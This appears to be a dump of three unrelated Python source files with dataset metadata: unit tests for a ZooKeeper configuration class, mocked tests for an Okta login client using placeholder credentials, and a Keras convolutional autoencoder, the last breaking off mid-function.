43e38fe40297a1e7a9329bcf3db3554c7ca48ead
|
[
"MIT"
] | null | null | null |
zkutil/test/test_zkconf.py
|
wenbobuaa/pykit
|
43e38fe40297a1e7a9329bcf3db3554c7ca48ead
|
[
"MIT"
] | null | null | null |
import unittest
from pykit import config
from pykit import ututil
from pykit import zkutil
dd = ututil.dd
class TestZKConf(unittest.TestCase):
def test_specified(self):
c = zkutil.ZKConf(
hosts='hosts',
tx_dir='tx_dir/',
record_dir='record_dir/',
seq_dir='seq_dir/',
lock_dir='lock_dir/',
node_id='node_id',
auth=('digest', 'a', 'b'),
acl=(('foo', 'bar', 'cd'), ('xp', '123', 'cdrwa'))
)
self.assertEqual('hosts', c.hosts())
self.assertEqual('tx_dir/', c.tx_dir())
self.assertEqual('record_dir/', c.record_dir())
self.assertEqual('seq_dir/', c.seq_dir())
self.assertEqual('lock_dir/', c.lock_dir())
self.assertEqual('node_id', c.node_id())
self.assertEqual(('digest', 'a', 'b'), c.auth())
self.assertEqual((('foo', 'bar', 'cd'),
('xp', '123', 'cdrwa')),
c.acl())
self.assertEqual('lock_dir/', c.lock())
self.assertEqual('lock_dir/a', c.lock('a'))
self.assertEqual('record_dir/', c.record())
self.assertEqual('record_dir/a', c.record('a'))
self.assertEqual('tx_dir/alive/', c.tx_alive())
self.assertEqual('tx_dir/alive/a', c.tx_alive('a'))
self.assertEqual('tx_dir/alive/0000000001', c.tx_alive(1))
self.assertEqual('tx_dir/state/', c.tx_state())
self.assertEqual('tx_dir/state/a', c.tx_state('a'))
self.assertEqual('tx_dir/state/0000000001', c.tx_state(1))
self.assertEqual('tx_dir/journal/', c.journal())
self.assertEqual('tx_dir/journal/a', c.journal('a'))
self.assertEqual('tx_dir/journal/0000000001', c.journal(1))
self.assertEqual('tx_dir/txidset', c.txidset())
self.assertEqual('tx_dir/txid_maker', c.txid_maker())
self.assertEqual('seq_dir/', c.seq())
self.assertEqual('seq_dir/a', c.seq('a'))
self.assertEqual(zkutil.make_kazoo_digest_acl((('foo', 'bar', 'cd'), ('xp', '123', 'cdrwa'))),
c.kazoo_digest_acl())
self.assertEqual(('digest', 'a:b'), c.kazoo_auth())
def test_default(self):
        # snapshot every default overridden below (zk_seq_dir included) so it can be restored
        old = (
            config.zk_hosts,
            config.zk_tx_dir,
            config.zk_record_dir,
            config.zk_seq_dir,
            config.zk_lock_dir,
            config.zk_node_id,
            config.zk_auth,
            config.zk_acl,
        )
config.zk_hosts = 'HOSTS'
config.zk_tx_dir = 'TX_DIR/'
config.zk_record_dir = 'RECORD_DIR/'
config.zk_seq_dir = 'SEQ_DIR/'
config.zk_lock_dir = 'LOCK_DIR/'
config.zk_node_id = 'NODE_ID'
config.zk_auth = ('DIGEST', 'A', 'B')
config.zk_acl = (('FOO', 'BAR', 'CD'), ('XP', '123', 'CDRWA'))
c = zkutil.ZKConf()
self.assertEqual('HOSTS', c.hosts())
self.assertEqual('TX_DIR/', c.tx_dir())
self.assertEqual('RECORD_DIR/', c.record_dir())
self.assertEqual('SEQ_DIR/', c.seq_dir())
self.assertEqual('LOCK_DIR/', c.lock_dir())
self.assertEqual('NODE_ID', c.node_id())
self.assertEqual(('DIGEST', 'A', 'B'), c.auth())
self.assertEqual((('FOO', 'BAR', 'CD'),
('XP', '123', 'CDRWA')),
c.acl())
self.assertEqual('LOCK_DIR/', c.lock())
self.assertEqual('LOCK_DIR/a', c.lock('a'))
self.assertEqual('RECORD_DIR/', c.record())
self.assertEqual('RECORD_DIR/a', c.record('a'))
self.assertEqual('SEQ_DIR/', c.seq())
self.assertEqual('SEQ_DIR/a', c.seq('a'))
self.assertEqual('TX_DIR/alive/', c.tx_alive())
self.assertEqual('TX_DIR/alive/a', c.tx_alive('a'))
self.assertEqual('TX_DIR/alive/0000000001', c.tx_alive(1))
self.assertEqual('TX_DIR/state/', c.tx_state())
self.assertEqual('TX_DIR/state/a', c.tx_state('a'))
self.assertEqual('TX_DIR/state/0000000001', c.tx_state(1))
self.assertEqual('TX_DIR/journal/', c.journal())
self.assertEqual('TX_DIR/journal/a', c.journal('a'))
self.assertEqual('TX_DIR/journal/0000000001', c.journal(1))
self.assertEqual('TX_DIR/txidset', c.txidset())
self.assertEqual('TX_DIR/txid_maker', c.txid_maker())
self.assertEqual(zkutil.make_kazoo_digest_acl((('FOO', 'BAR', 'CD'), ('XP', '123', 'CDRWA'))),
c.kazoo_digest_acl())
self.assertEqual(('DIGEST', 'A:B'), c.kazoo_auth())
        (
            config.zk_hosts,
            config.zk_tx_dir,
            config.zk_record_dir,
            config.zk_seq_dir,
            config.zk_lock_dir,
            config.zk_node_id,
            config.zk_auth,
            config.zk_acl,
        ) = old
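# --- Editor's sketch (not part of the original file) ---------------------------
# test_default above mutates module-level defaults in `config` and restores them
# by hand at the end. A setUp/tearDown snapshot restores them even when an
# assertion fails mid-test; the attribute names are the ones exercised above.
class TestZKConfDefaultIsolation(unittest.TestCase):

    _fields = ('zk_hosts', 'zk_tx_dir', 'zk_record_dir', 'zk_seq_dir',
               'zk_lock_dir', 'zk_node_id', 'zk_auth', 'zk_acl')

    def setUp(self):
        # snapshot current defaults before the test overrides them
        self._saved = {f: getattr(config, f) for f in self._fields}

    def tearDown(self):
        # roll back unconditionally, even if the test body raised
        for f, v in self._saved.items():
            setattr(config, f, v)

    def test_hosts_default(self):
        config.zk_hosts = 'HOSTS'
        self.assertEqual('HOSTS', zkutil.ZKConf().hosts())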
| 42.185484
| 102
| 0.50736
| 611
| 5,231
| 4.124386
| 0.081833
| 0.321429
| 0.161905
| 0.190476
| 0.869048
| 0.847619
| 0.830556
| 0.822222
| 0.813492
| 0.813492
| 0
| 0.02383
| 0.326133
| 5,231
| 123
| 103
| 42.528455
| 0.691064
| 0
| 0
| 0.171429
| 0
| 0
| 0.162493
| 0.027146
| 0
| 0
| 0
| 0
| 0.514286
| 1
| 0.019048
| false
| 0
| 0.038095
| 0
| 0.066667
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
a78723847cfe82b0d4a9bd5516a27a19629adb9a
| 24,332
|
py
|
Python
|
tests/core/test_okta.py
|
dclayton-godaddy/aws-okta-processor
|
ec7603a194ab24d40c2aee4f05e4f87296a880d5
|
[
"MIT"
] | null | null | null |
tests/core/test_okta.py
|
dclayton-godaddy/aws-okta-processor
|
ec7603a194ab24d40c2aee4f05e4f87296a880d5
|
[
"MIT"
] | null | null | null |
tests/core/test_okta.py
|
dclayton-godaddy/aws-okta-processor
|
ec7603a194ab24d40c2aee4f05e4f87296a880d5
|
[
"MIT"
] | null | null | null |
from tests.test_base import TestBase
from tests.test_base import SESSION_RESPONSE
from tests.test_base import AUTH_TOKEN_RESPONSE
from tests.test_base import AUTH_MFA_PUSH_RESPONSE
from tests.test_base import AUTH_MFA_TOTP_RESPONSE
from tests.test_base import AUTH_MFA_MULTIPLE_RESPONSE
from tests.test_base import AUTH_MFA_YUBICO_HARDWARE_RESPONSE
from tests.test_base import MFA_WAITING_RESPONSE
from tests.test_base import APPLICATIONS_RESPONSE
from tests.test_base import SAML_RESPONSE
from mock import patch
from mock import call
from mock import MagicMock
from datetime import datetime
from collections import OrderedDict
from requests import ConnectionError
from requests import ConnectTimeout
from aws_okta_processor.core.okta import Okta
import responses
import json
class StubDate(datetime):
pass
class TestOkta(TestBase):
@patch('aws_okta_processor.core.okta.os.chmod')
@patch('aws_okta_processor.core.okta.open')
@patch('aws_okta_processor.core.okta.os.makedirs')
@patch('aws_okta_processor.core.okta.print_tty')
@responses.activate
def test_okta(
self,
mock_print_tty,
mock_makedirs,
mock_open,
mock_chmod
):
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn',
json=json.loads(AUTH_TOKEN_RESPONSE)
)
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/sessions',
json=json.loads(SESSION_RESPONSE)
)
okta = Okta(
user_name="user_name",
user_pass="user_pass",
organization="organization.okta.com"
)
self.assertEqual(okta.okta_single_use_token, "single_use_token")
self.assertEqual(okta.organization, "organization.okta.com")
self.assertEqual(okta.okta_session_id, "session_token")
@patch('aws_okta_processor.core.okta.os.chmod')
@patch('aws_okta_processor.core.okta.open')
@patch('aws_okta_processor.core.okta.getpass')
@patch('aws_okta_processor.core.okta.os.makedirs')
@patch('aws_okta_processor.core.okta.print_tty')
@responses.activate
def test_okta_no_pass(
self,
mock_print_tty,
mock_makedirs,
mock_getpass,
mock_open,
mock_chmod
):
mock_getpass.getpass.return_value = "user_pass"
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn',
json=json.loads(AUTH_TOKEN_RESPONSE)
)
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/sessions',
json=json.loads(SESSION_RESPONSE)
)
okta = Okta(
user_name="user_name",
organization="organization.okta.com"
)
mock_getpass.getpass.assert_called_once()
self.assertEqual(okta.okta_single_use_token, "single_use_token")
self.assertEqual(okta.organization, "organization.okta.com")
self.assertEqual(okta.okta_session_id, "session_token")
@patch('aws_okta_processor.core.okta.os.chmod')
@patch('aws_okta_processor.core.okta.open')
@patch('aws_okta_processor.core.okta.datetime', StubDate)
@patch('aws_okta_processor.core.okta.os.path.isfile')
@patch('aws_okta_processor.core.okta.os.makedirs')
@patch('aws_okta_processor.core.okta.print_tty')
@responses.activate
def test_okta_cached_session(
self,
mock_print_tty,
mock_makedirs,
mock_isfile,
mock_open,
mock_chmod
):
StubDate.now = classmethod(lambda cls, tz: datetime(1, 1, 1, 0, 0, tzinfo=tz))
mock_isfile.return_value = True
mock_enter = MagicMock()
mock_enter.read.return_value = SESSION_RESPONSE
mock_open().__enter__.return_value = mock_enter
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/sessions/me/lifecycle/refresh',
json=json.loads(SESSION_RESPONSE)
)
okta = Okta(
user_name="user_name",
user_pass="user_pass",
organization="organization.okta.com"
)
self.assertEqual(okta.okta_session_id, "session_token")
self.assertEqual(okta.organization, "organization.okta.com")
@patch('aws_okta_processor.core.okta.os.makedirs')
@patch('aws_okta_processor.core.okta.print_tty')
@responses.activate
def test_okta_auth_value_error(
self,
mock_print_tty,
mock_makedirs
):
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn',
body="NOT JSON",
status=500
)
with self.assertRaises(SystemExit):
Okta(
user_name="user_name",
user_pass="user_pass",
organization="organization.okta.com"
)
print_tty_calls = [
call("Error: Status Code: 500"),
call("Error: Invalid JSON")
]
mock_print_tty.assert_has_calls(print_tty_calls)
@patch('aws_okta_processor.core.okta.os.makedirs')
@patch('aws_okta_processor.core.okta.print_tty')
@responses.activate
def test_okta_auth_send_error(
self,
mock_print_tty,
mock_makedirs
):
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn',
json={
"status": "foo",
"errorSummary": "bar"
},
status=500
)
with self.assertRaises(SystemExit):
Okta(
user_name="user_name",
user_pass="user_pass",
organization="organization.okta.com"
)
print_tty_calls = [
call("Error: Status Code: 500"),
call("Error: Status: foo"),
call("Error: Summary: bar")
]
mock_print_tty.assert_has_calls(print_tty_calls)
@patch('aws_okta_processor.core.okta.os.chmod')
@patch('aws_okta_processor.core.okta.open')
@patch('aws_okta_processor.core.okta.os.makedirs')
@patch('aws_okta_processor.core.okta.print_tty')
@responses.activate
def test_okta_mfa_push_challenge(
self,
mock_print_tty,
mock_makedirs,
mock_open,
mock_chmod
):
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn',
json=json.loads(AUTH_MFA_PUSH_RESPONSE)
)
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn/factors/id/verify',
json=json.loads(MFA_WAITING_RESPONSE)
)
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn/factors/id/lifecycle/activate/poll',
json=json.loads(AUTH_TOKEN_RESPONSE)
)
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/sessions',
json=json.loads(SESSION_RESPONSE)
)
okta = Okta(
user_name="user_name",
user_pass="user_pass",
organization="organization.okta.com"
)
self.assertEqual(okta.okta_single_use_token, "single_use_token")
self.assertEqual(okta.organization, "organization.okta.com")
self.assertEqual(okta.okta_session_id, "session_token")
@patch('aws_okta_processor.core.okta.input')
@patch('aws_okta_processor.core.okta.os.chmod')
@patch('aws_okta_processor.core.okta.open')
@patch('aws_okta_processor.core.okta.os.makedirs')
@patch('aws_okta_processor.core.okta.print_tty')
@responses.activate
def test_okta_mfa_totp_challenge(
self,
mock_print_tty,
mock_makedirs,
mock_open,
mock_chmod,
mock_input
):
mock_input.return_value = "123456"
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn',
json=json.loads(AUTH_MFA_TOTP_RESPONSE)
)
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn/factors/id/verify',
json=json.loads(AUTH_TOKEN_RESPONSE)
)
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/sessions',
json=json.loads(SESSION_RESPONSE)
)
okta = Okta(
user_name="user_name",
user_pass="user_pass",
organization="organization.okta.com"
)
self.assertEqual(okta.okta_single_use_token, "single_use_token")
self.assertEqual(okta.organization, "organization.okta.com")
self.assertEqual(okta.okta_session_id, "session_token")
@patch('aws_okta_processor.core.okta.input')
@patch('aws_okta_processor.core.okta.os.chmod')
@patch('aws_okta_processor.core.okta.open')
@patch('aws_okta_processor.core.okta.os.makedirs')
@patch('aws_okta_processor.core.okta.print_tty')
@responses.activate
def test_okta_mfa_hardware_token_challenge(
self,
mock_print_tty,
mock_makedirs,
mock_open,
mock_chmod,
mock_input
):
mock_input.return_value = "123456"
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn',
json=json.loads(AUTH_MFA_YUBICO_HARDWARE_RESPONSE)
)
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn/factors/id/verify',
json=json.loads(AUTH_TOKEN_RESPONSE)
)
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/sessions',
json=json.loads(SESSION_RESPONSE)
)
okta = Okta(
user_name="user_name",
user_pass="user_pass",
organization="organization.okta.com"
)
self.assertEqual(okta.okta_single_use_token, "single_use_token")
self.assertEqual(okta.organization, "organization.okta.com")
self.assertEqual(okta.okta_session_id, "session_token")
@patch('aws_okta_processor.core.prompt.input')
@patch('aws_okta_processor.core.okta.os.chmod')
@patch('aws_okta_processor.core.okta.open')
@patch('aws_okta_processor.core.okta.os.makedirs')
@patch('aws_okta_processor.core.okta.print_tty', new=MagicMock())
@patch('aws_okta_processor.core.prompt.print_tty', new=MagicMock())
@responses.activate
def test_okta_mfa_push_multiple_factor_challenge(
self,
mock_makedirs,
mock_open,
mock_chmod,
mock_input
):
mock_input.return_value = "2"
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn',
json=json.loads(AUTH_MFA_MULTIPLE_RESPONSE)
)
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn/factors/id/verify',
json=json.loads(MFA_WAITING_RESPONSE)
)
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn/factors/id/lifecycle/activate/poll',
json=json.loads(AUTH_TOKEN_RESPONSE)
)
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/sessions',
json=json.loads(SESSION_RESPONSE)
)
okta = Okta(
user_name="user_name",
user_pass="user_pass",
organization="organization.okta.com"
)
self.assertEqual(okta.okta_single_use_token, "single_use_token")
self.assertEqual(okta.organization, "organization.okta.com")
self.assertEqual(okta.okta_session_id, "session_token")
@patch('aws_okta_processor.core.okta.os.chmod')
@patch('aws_okta_processor.core.okta.open')
@patch('aws_okta_processor.core.okta.os.makedirs')
@patch('aws_okta_processor.core.okta.print_tty')
@responses.activate
def test_okta_mfa_verify_value_error(
self,
mock_print_tty,
mock_makedirs,
mock_open,
mock_chmod
):
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn',
json=json.loads(AUTH_MFA_PUSH_RESPONSE)
)
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn/factors/id/verify',
body="NOT JSON",
status=500
)
with self.assertRaises(SystemExit):
Okta(
user_name="user_name",
user_pass="user_pass",
organization="organization.okta.com"
)
print_tty_calls = [
call("Error: Status Code: 500"),
call("Error: Invalid JSON")
]
mock_print_tty.assert_has_calls(print_tty_calls)
@patch('aws_okta_processor.core.okta.os.chmod')
@patch('aws_okta_processor.core.okta.open')
@patch('aws_okta_processor.core.okta.os.makedirs')
@patch('aws_okta_processor.core.okta.print_tty')
@responses.activate
def test_okta_mfa_verify_send_error(
self,
mock_print_tty,
mock_makedirs,
mock_open,
mock_chmod
):
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn',
json=json.loads(AUTH_MFA_PUSH_RESPONSE)
)
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn/factors/id/verify',
json={
"status": "foo",
"errorSummary": "bar"
},
status=500
)
with self.assertRaises(SystemExit):
Okta(
user_name="user_name",
user_pass="user_pass",
organization="organization.okta.com"
)
print_tty_calls = [
call("Error: Status Code: 500"),
call("Error: Status: foo"),
call("Error: Summary: bar")
]
mock_print_tty.assert_has_calls(print_tty_calls)
@patch('aws_okta_processor.core.okta.os.chmod')
@patch('aws_okta_processor.core.okta.open')
@patch('aws_okta_processor.core.okta.os.makedirs')
@patch('aws_okta_processor.core.okta.print_tty')
@responses.activate
def test_okta_session_id_key_error(
self,
mock_print_tty,
mock_makedirs,
mock_open,
mock_chmod
):
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn',
json=json.loads(AUTH_TOKEN_RESPONSE)
)
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/sessions',
json={
"status": "foo",
"errorSummary": "bar"
},
status=500
)
with self.assertRaises(SystemExit):
Okta(
user_name="user_name",
user_pass="user_pass",
organization="organization.okta.com"
)
print_tty_calls = [
call("Error: Status Code: 500"),
call("Error: Status: foo"),
call("Error: Summary: bar")
]
mock_print_tty.assert_has_calls(print_tty_calls)
@patch('aws_okta_processor.core.okta.os.chmod')
@patch('aws_okta_processor.core.okta.open')
@patch('aws_okta_processor.core.okta.os.makedirs')
@patch('aws_okta_processor.core.okta.print_tty')
@responses.activate
def test_okta_session_id_value_error(
self,
mock_print_tty,
mock_makedirs,
mock_open,
mock_chmod
):
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn',
json=json.loads(AUTH_TOKEN_RESPONSE)
)
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/sessions',
body="NOT JSON",
status=500
)
with self.assertRaises(SystemExit):
Okta(
user_name="user_name",
user_pass="user_pass",
organization="organization.okta.com"
)
print_tty_calls = [
call("Error: Status Code: 500"),
call("Error: Invalid JSON")
]
mock_print_tty.assert_has_calls(print_tty_calls)
@patch('aws_okta_processor.core.okta.os.chmod')
@patch('aws_okta_processor.core.okta.open')
@patch('aws_okta_processor.core.okta.datetime', StubDate)
@patch('aws_okta_processor.core.okta.os.path.isfile')
@patch('aws_okta_processor.core.okta.os.makedirs')
@patch('aws_okta_processor.core.okta.print_tty')
@responses.activate
def test_okta_refresh_key_error(
self,
mock_print_tty,
mock_makedirs,
mock_isfile,
mock_open,
mock_chmod
):
StubDate.now = classmethod(lambda cls, tz: datetime(1, 1, 1, 0, 0, tzinfo=tz))
mock_isfile.return_value = True
mock_enter = MagicMock()
mock_enter.read.return_value = SESSION_RESPONSE
mock_open().__enter__.return_value = mock_enter
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/sessions/me/lifecycle/refresh',
json={
"status": "foo",
"errorSummary": "bar"
},
status=500
)
Okta(
user_name="user_name",
user_pass="user_pass",
organization="organization.okta.com"
)
print_tty_calls = [
call("Error: Status Code: 500"),
call("Error: Status: foo"),
call("Error: Summary: bar")
]
mock_print_tty.assert_has_calls(print_tty_calls)
@patch('aws_okta_processor.core.okta.os.chmod')
@patch('aws_okta_processor.core.okta.open')
@patch('aws_okta_processor.core.okta.datetime', StubDate)
@patch('aws_okta_processor.core.okta.os.path.isfile')
@patch('aws_okta_processor.core.okta.os.makedirs')
@patch('aws_okta_processor.core.okta.print_tty')
@responses.activate
def test_okta_refresh_value_error(
self,
mock_print_tty,
mock_makedirs,
mock_isfile,
mock_open,
mock_chmod
):
StubDate.now = classmethod(lambda cls, tz: datetime(1, 1, 1, 0, 0, tzinfo=tz))
mock_isfile.return_value = True
mock_enter = MagicMock()
mock_enter.read.return_value = SESSION_RESPONSE
mock_open().__enter__.return_value = mock_enter
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/sessions/me/lifecycle/refresh',
body="bob",
status=500
)
with self.assertRaises(SystemExit):
Okta(
user_name="user_name",
user_pass="user_pass",
organization="organization.okta.com"
)
print_tty_calls = [
call("Error: Status Code: 500"),
call("Error: Invalid JSON")
]
mock_print_tty.assert_has_calls(print_tty_calls)
@patch('aws_okta_processor.core.okta.os.chmod')
@patch('aws_okta_processor.core.okta.open')
@patch('aws_okta_processor.core.okta.os.makedirs')
@patch('aws_okta_processor.core.okta.print_tty')
@responses.activate
def test_okta_get_applications(
self,
mock_print_tty,
mock_makedirs,
mock_open,
mock_chmod
):
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn',
json=json.loads(AUTH_TOKEN_RESPONSE)
)
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/sessions',
json=json.loads(SESSION_RESPONSE)
)
responses.add(
responses.GET,
'https://organization.okta.com/api/v1/users/me/appLinks',
json=json.loads(APPLICATIONS_RESPONSE)
)
okta = Okta(
user_name="user_name",
user_pass="user_pass",
organization="organization.okta.com"
)
applications = okta.get_applications()
expected_applications = OrderedDict(
[
('AWS', 'https://organization.okta.com/home/amazon_aws/0oa3omz2i9XRNSRIHBZO/270'),
('AWS GOV', 'https://organization.okta.com/home/amazon_aws/0oa3omz2i9XRNSRIHBZO/272')
]
)
self.assertEqual(applications, expected_applications)
@patch('aws_okta_processor.core.okta.os.chmod')
@patch('aws_okta_processor.core.okta.open')
@patch('aws_okta_processor.core.okta.os.makedirs')
@patch('aws_okta_processor.core.okta.print_tty')
@responses.activate
def test_okta_get_saml_response(
self,
mock_print_tty,
mock_makedirs,
mock_open,
mock_chmod
):
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn',
json=json.loads(AUTH_TOKEN_RESPONSE)
)
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/sessions',
json=json.loads(SESSION_RESPONSE)
)
responses.add(
responses.GET,
'https://organization.okta.com/home/amazon_aws/0oa3omz2i9XRNSRIHBZO/270',
body=SAML_RESPONSE
)
okta = Okta(
user_name="user_name",
user_pass="user_pass",
organization="organization.okta.com"
)
saml_response = okta.get_saml_response(
application_url='https://organization.okta.com/home/amazon_aws/0oa3omz2i9XRNSRIHBZO/270'
)
self.assertEqual(saml_response, SAML_RESPONSE)
@patch('aws_okta_processor.core.okta.os.chmod')
@patch('aws_okta_processor.core.okta.open')
@patch('aws_okta_processor.core.okta.os.makedirs')
@patch('aws_okta_processor.core.okta.print_tty')
@responses.activate
def test_okta_connection_timeout(
self,
mock_print_tty,
mock_makedirs,
mock_open,
mock_chmod
):
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn',
body=ConnectTimeout()
)
with self.assertRaises(SystemExit):
Okta(
user_name="user_name",
user_pass="user_pass",
organization="organization.okta.com"
)
print_tty_calls = [
call("Error: Timed Out")
]
mock_print_tty.assert_has_calls(print_tty_calls)
@patch('aws_okta_processor.core.okta.os.chmod')
@patch('aws_okta_processor.core.okta.open')
@patch('aws_okta_processor.core.okta.os.makedirs')
@patch('aws_okta_processor.core.okta.print_tty')
@responses.activate
def test_okta_connection_error(
self,
mock_print_tty,
mock_makedirs,
mock_open,
mock_chmod
):
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn',
body=ConnectionError()
)
with self.assertRaises(SystemExit):
Okta(
user_name="user_name",
user_pass="user_pass",
organization="organization.okta.com"
)
print_tty_calls = [
call("Error: Connection Error")
]
mock_print_tty.assert_has_calls(print_tty_calls)
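# --- Editor's sketch (not part of the original tests) --------------------------
# Nearly every case above registers the same authn and sessions endpoints. A
# small helper removes that duplication; it only uses the fixtures, URLs and
# `responses` calls already present in this file.
def add_okta_login_responses(auth_body=AUTH_TOKEN_RESPONSE):
    # mock the primary authentication call
    responses.add(
        responses.POST,
        'https://organization.okta.com/api/v1/authn',
        json=json.loads(auth_body)
    )
    # mock the session creation call
    responses.add(
        responses.POST,
        'https://organization.okta.com/api/v1/sessions',
        json=json.loads(SESSION_RESPONSE)
    )

# Inside a test decorated with @responses.activate, the two repeated
# responses.add(...) blocks collapse to:
#     add_okta_login_responses()
#     okta = Okta(user_name="user_name", user_pass="user_pass",
#                 organization="organization.okta.com")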
| 30.878173
| 101
| 0.593211
| 2,671
| 24,332
| 5.137402
| 0.049794
| 0.042851
| 0.097945
| 0.122431
| 0.934339
| 0.925667
| 0.915829
| 0.905699
| 0.885877
| 0.870864
| 0
| 0.008326
| 0.299071
| 24,332
| 787
| 102
| 30.917408
| 0.796247
| 0
| 0
| 0.785924
| 0
| 0.002933
| 0.284728
| 0.149515
| 0
| 0
| 0
| 0
| 0.061584
| 1
| 0.027859
| false
| 0.035191
| 0.029326
| 0
| 0.060117
| 0.085044
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ac647a71bb737d82d3c82d5896aac4e114739f93
| 12,508
|
py
|
Python
|
Build_AutoEncoder.py
|
nephilim2016/AutoEncoder-for-GPR-Denoise
|
b55be16bd0b6af785efcf072d68dd5523a72f964
|
[
"MIT"
] | null | null | null |
Build_AutoEncoder.py
|
nephilim2016/AutoEncoder-for-GPR-Denoise
|
b55be16bd0b6af785efcf072d68dd5523a72f964
|
[
"MIT"
] | null | null | null |
Build_AutoEncoder.py
|
nephilim2016/AutoEncoder-for-GPR-Denoise
|
b55be16bd0b6af785efcf072d68dd5523a72f964
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Jul 8 16:58:10 2020
@author: nephilim
"""
import keras
# def mse(y_true,y_pred):
# return keras.backend.mean(keras.backend.square(y_pred-y_true),axis=-1)
class AutoEncoder():
def __init__(self,ImageShape,filters,kernel_size,latent_dim):
self.ImageShape=ImageShape
self.filters=filters
self.kernel_size=kernel_size
self.latent_dim=latent_dim
def Encoder(self):
self.Encoder_Input=keras.Input(shape=self.ImageShape,name='Encoder_Input_2D')
x=self.Encoder_Input
for idx,_ in enumerate(self.filters):
x=keras.layers.Conv2D(filters=self.filters[idx],kernel_size=self.kernel_size[idx],activation='relu',padding='same')(x)
x=keras.layers.BatchNormalization()(x)
x=keras.layers.MaxPool2D((2,2))(x)
self.shape=keras.backend.int_shape(x)
# print(self.shape)
x=keras.layers.Flatten()(x)
        Encoder_Output=keras.layers.Dense(self.latent_dim,name='Encoder_Output_1D')(x)
self.EncoderMode=keras.models.Model(inputs=self.Encoder_Input,outputs=Encoder_Output,name='EncoderPart')
self.EncoderMode.summary()
self.EncoderMode.compile(loss='mse',optimizer='adam')
def Decoder(self):
Decoder_Input=keras.Input(shape=(self.latent_dim,),name='Decoder_Input_1D')
x=keras.layers.Dense(self.shape[1]*self.shape[2]*self.shape[3])(Decoder_Input)
x=keras.layers.Reshape((self.shape[1],self.shape[2],self.shape[3]))(x)
for idx,_ in enumerate(self.filters):
x=keras.layers.Conv2DTranspose(filters=self.filters[len(self.filters)-idx-1],kernel_size=self.kernel_size[len(self.kernel_size)-idx-1],activation='relu',padding='same')(x)
x=keras.layers.BatchNormalization()(x)
x=keras.layers.UpSampling2D((2,2))(x)
Decoder_Output=keras.layers.Conv2DTranspose(filters=1,kernel_size=3,activation='sigmoid',padding='same',name='Decoder_Output_1D')(x)
self.DecoderMode=keras.models.Model(inputs=Decoder_Input,outputs=Decoder_Output)
self.DecoderMode.summary()
self.DecoderMode.compile(loss='mse',optimizer='adam')
def DropOutEncoder(self):
self.Encoder_Input=keras.Input(shape=self.ImageShape,name='Encoder_Input_2D')
x=self.Encoder_Input
for idx,_ in enumerate(self.filters):
x=keras.layers.Conv2D(filters=self.filters[idx],kernel_size=self.kernel_size[idx],activation='relu',padding='same')(x)
x=keras.layers.BatchNormalization()(x)
x=keras.layers.MaxPool2D((2,2))(x)
x=keras.layers.Dropout(0.2)(x)
# if idx==1:
# residual=keras.layers.Conv2D(filters=self.filters[idx],kernel_size=3,padding='same')(self.Encoder_Input)
# residual=keras.layers.MaxPool2D((4,4))(residual)
# x=keras.layers.add([x,residual])
# residual=keras.layers.Conv2D(filters=self.filters[-1],kernel_size=3,strides=2**len(self.filters),padding='same')(self.Encoder_Input)
# x=keras.layers.add([x,residual])
self.shape=keras.backend.int_shape(x)
# print(self.shape)
x=keras.layers.Flatten()(x)
        Encoder_Output=keras.layers.Dense(self.latent_dim,name='Encoder_Output_1D')(x)
self.EncoderMode=keras.models.Model(inputs=self.Encoder_Input,outputs=Encoder_Output,name='EncoderPart')
self.EncoderMode.summary()
self.EncoderMode.compile(loss='mse',optimizer='adam')
def DropOutDecoder(self):
Decoder_Input=keras.Input(shape=(self.latent_dim,),name='Decoder_Input_1D')
x=keras.layers.Dense(self.shape[1]*self.shape[2]*self.shape[3])(Decoder_Input)
x=keras.layers.Reshape((self.shape[1],self.shape[2],self.shape[3]))(x)
for idx,_ in enumerate(self.filters):
